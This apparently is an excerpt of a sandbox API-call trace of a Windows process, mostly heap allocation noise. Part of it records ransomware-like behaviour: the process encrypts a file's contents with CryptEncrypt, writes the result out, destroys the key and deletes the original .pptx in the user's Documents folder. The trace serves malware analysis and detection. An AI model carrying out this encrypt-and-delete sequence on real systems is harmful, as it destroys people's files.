[0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0220.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.173] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0220.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0220.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.174] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17685, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x17688) returned 1 [0220.174] CharLowerBuffW (in: lpsz="byte[95880]", cchLength=0xb | out: lpsz="byte[95880]") returned 0xb [0220.184] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.184] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.185] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3867020*, pdwDataLen=0x8cef60*=0x17685, dwBufLen=0x17688 | out: pbData=0x3867020*, pdwDataLen=0x8cef60*=0x17688) returned 1 [0220.190] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.190] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.192] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.192] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.192] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.192] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.201] WriteFile (in: hFile=0x524, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x17688, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x17688, lpOverlapped=0x0) returned 1 [0220.203] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0220.203] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0220.203] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.203] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaba28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0220.204] CryptDestroyKey (hKey=0x9e1cb8) returned 1 [0220.204] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.204] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.204] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.204] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.204] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.204] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.204] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.204] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.204] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.204] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.204] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.204] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.204] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.204] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.204] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.204] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0220.205] CryptReleaseContext (hProv=0xa7c4c8, dwFlags=0x0) returned 1 [0220.205] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.205] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.205] FreeLibrary (hLibModule=0x76390000) returned 1 [0220.205] CloseHandle (hObject=0x510) returned 1 [0220.207] CloseHandle (hObject=0x524) returned 1 [0220.210] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.210] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.210] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/qf_lD4ykVY6P7.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\qf_lD4ykVY6P7.pptx", lpFilePart=0x8cedf4*="qf_lD4ykVY6P7.pptx") returned 0x2c [0220.210] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\qf_lD4ykVY6P7.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qf_ld4ykvy6p7.pptx")) returned 0x20 [0220.210] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\qf_lD4ykVY6P7.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9d6fa90, ftCreationTime.dwHighDateTime=0x1d59068, ftLastAccessTime.dwLowDateTime=0xb8a31ad0, ftLastAccessTime.dwHighDateTime=0x1d5b4cd, ftLastWriteTime.dwLowDateTime=0xb8a31ad0, ftLastWriteTime.dwHighDateTime=0x1d5b4cd, nFileSizeHigh=0x0, nFileSizeLow=0x17685, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="qf_lD4ykVY6P7.pptx", cAlternateFileName="QF_LD4~1.PPT")) returned 0x9e1eb8 [0220.211] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\qf_lD4ykVY6P7.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qf_ld4ykvy6p7.pptx")) returned 1 [0220.225] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9d6fa90, ftCreationTime.dwHighDateTime=0x1d59068, ftLastAccessTime.dwLowDateTime=0xb8a31ad0, ftLastAccessTime.dwHighDateTime=0x1d5b4cd, ftLastWriteTime.dwLowDateTime=0xb8a31ad0, ftLastWriteTime.dwHighDateTime=0x1d5b4cd, nFileSizeHigh=0x0, nFileSizeLow=0x17685, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="qf_lD4ykVY6P7.pptx", cAlternateFileName="QF_LD4~1.PPT")) returned 0 [0220.225] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0220.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854830 | out: hHeap=0x2af0000) returned 1 [0220.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0220.225] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0220.225] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0220.226] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854470 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0220.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5a) returned 0x2a749e8 [0220.227] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/qf_lD4ykVY6P7.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\qf_lD4ykVY6P7.pptx", lpFilePart=0x8cf650*="qf_lD4ykVY6P7.pptx") returned 0x2c [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a749e8 | out: hHeap=0x2af0000) returned 1 [0220.227] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\qf_lD4ykVY6P7.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qf_ld4ykvy6p7.pptx")) returned 0xffffffff [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854470 | out: hHeap=0x2af0000) returned 1 [0220.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.228] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0220.228] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.228] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0220.228] 